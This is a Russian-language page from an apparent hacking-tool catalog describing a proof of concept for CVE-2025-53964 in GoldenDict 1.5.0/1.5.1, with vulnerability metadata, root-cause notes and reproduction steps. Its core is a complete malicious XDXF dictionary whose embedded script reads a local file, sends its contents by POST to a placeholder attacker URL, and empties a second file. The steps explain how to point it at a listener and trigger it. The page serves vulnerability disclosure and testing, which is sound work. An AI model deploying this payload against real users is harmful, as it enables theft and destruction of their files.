Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-53964 — Эксплуатационный код (Proof-of-concept) для CVE-2025-53964: удаленное чтение/запись файлов через вредоносный словарь XDXF в GoldenDict 1.5.0/1.5.1, использующий несанитизированное выполнение XML и JS. | Kitploit
Инструменты/GitHubGitHub/tigr78/cve-2025-53964
Статический анализАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubtigr78/cve-2025-53964

CVE-2025-53964

Эксплуатационный код (Proof-of-concept) для CVE-2025-53964: удаленное чтение/запись файлов через вредоносный словарь XDXF в GoldenDict 1.5.0/1.5.1, использующий несанитизированное выполнение XML и JS.

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-53964

Оценка риска

CVSS v3: (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L) - 9.6/10

Описание

GoldenDict 1.5.0 и 1.5.1 имеет открытый опасный метод, позволяющий читать и изменять файлы, когда пользователь добавляет подготовленный словарь, а затем ищет любой термин, включённый в этот словарь.

Дополнительная информация

Продукт предоставляет интерфейс для взаимодействия с внешними субъектами, который включает опасный метод в GoldenDict (версии 1.5.0, 1.5.1), не имеющий должных ограничений. Это позволяет удалённому злоумышленнику получить доступ к чтению и изменению файлов в файловой системе пользователя, когда подготовленный вредоносный словарь добавляется и используется в программе.

Тип уязвимости

CWE-749: Открытый опасный метод или функция; CWE-79: Неправильная нейтрализация ввода во время генерации веб-страницы ('Межсайтовый скриптинг')

Поставщик продукта

GoldenDict Project

Затронутая кодовая база продукта

GoldenDict - 1.5.0, 1.5.1

Затронутый компонент

Исполняемый файл GoldenDict, файл исходного кода xdxf.cc, файл исходного кода xdxf2html.cc, файл исходного кода stardict.cc.

Тип атаки

Удалённый

Влияние: выполнение кода

true

Влияние: раскрытие информации

true

Прочее влияние CVE

Доступ к чтению и изменению файлов в файловой системе пользователя

Векторы атаки

Чтобы использовать уязвимость, пользователь должен добавить вредоносный словарь в программу и выполнить поиск любого термина, включённого в этот словарь.

Обнаруживший

Grebennikov Timofey, специалист группы тестирования на проникновение отдела контроля безопасности разработки компании «Астра Груп».

Ссылка

https://github.com/goldendict/goldendict/releases

Подробности

GoldenDict — это графическая программа для поиска терминов в Wikipedia и локально установленных словарях. Поддерживаются различные форматы словарей, включая формат XDXF с XML-разметкой. Словари распространяются в Интернете другими пользователями.

Программа использует браузерный движок, входящий в состав пакета компонентов Qt Widgets, для рендеринга и отображения слов из словарей.

Было обнаружено сразу несколько нарушений безопасности, которые позволяют реализовать критическую уязвимость:

  1. Отсутствие санитизации содержимого XML;
  2. Отсутствие запрета на выполнение JS-кода;
  3. Отключённая или слабая политика CSP.

Вместе эти нарушения приводят к возможности получения доступа к файлам пользователя путём внедрения вредоносного JS-кода в XML-разметку словаря XDXF, загруженного из Интернета.

Доказательство концепции

Чтобы проверить уязвимость на Windows, можно запустить скрипт, который воздействует на два подготовленных файла в файловой системе.

  1. Создайте два файла в каталоге C:\Users\Public\Documents и заполните их любым содержимым:
  • secret.txt – некоторая конфиденциальная информация;
  • idea.txt – некоторая важная информация, которую вы не хотите потерять.
  1. Создайте XDXF-словарь malicious_dictionary.xdxf со следующим содержимым:
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xdxf lang_from="ENG" lang_to="RUS" format="logical">
    <full_name>Malicious dictionary</full_name>
    <description>You have been pwned!</description>
    <meta_info>
        <copyright>Public Domain</copyright>
    </meta_info>
    <lexicon>
        <ar>
            <k>vuln_test</k>
            <def>
                Some description...
                <script>
                    var secretFile = 'file:///C:/Users/Public/Documents/secret.txt';
                    var ideaFile = 'file:///C:/Users/Public/Documents/idea.txt';
                    var xhr = new XMLHttpRequest();
                    xhr.open('GET', secretFile, true);
                    xhr.onload = function() {
                        var secretData = xhr.responseText;
                        if (secretData.length > 0) {
                            var xhr2 = new XMLHttpRequest();
                            xhr2.open('POST', '[Target-URL]', true);
                            xhr2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                            xhr2.send('data=' + encodeURIComponent(secretData));
                        }
                    };
                    xhr.onerror = function() {
                    };
                    xhr.send();
                    var xhr3 = new XMLHttpRequest();
                    xhr3.open('PUT', ideaFile, true);
                    xhr3.setRequestHeader('Content-Type', 'text/plain');
                    xhr3.send("");
                </script>
            </def>
        </ar>
    </lexicon>
</xdxf>

При инициализации этот словарь отправит содержимое secret.txt на удалённый сервер и очистит idea.txt.

  1. Замените шаблон [Target-URL] на адрес любого HTTP-прослушивателя запросов, которым вы управляете.
  2. Добавьте созданный словарь в список локальных словарей GoldenDict.
  3. Выполните поиск термина «vuln-test».

Проверьте успешность атаки – получатель получит сообщение, содержащее содержимое файла secret.txt, а файл idea.txt будет пустым.

Уязвимость затрагивает как системы Windows, так и Linux. Для воспроизведения уязвимости на системе Linux необходимо использовать другие каталоги для хранения тестовых файлов и указать это во вредоносном коде.

Скачать инструмент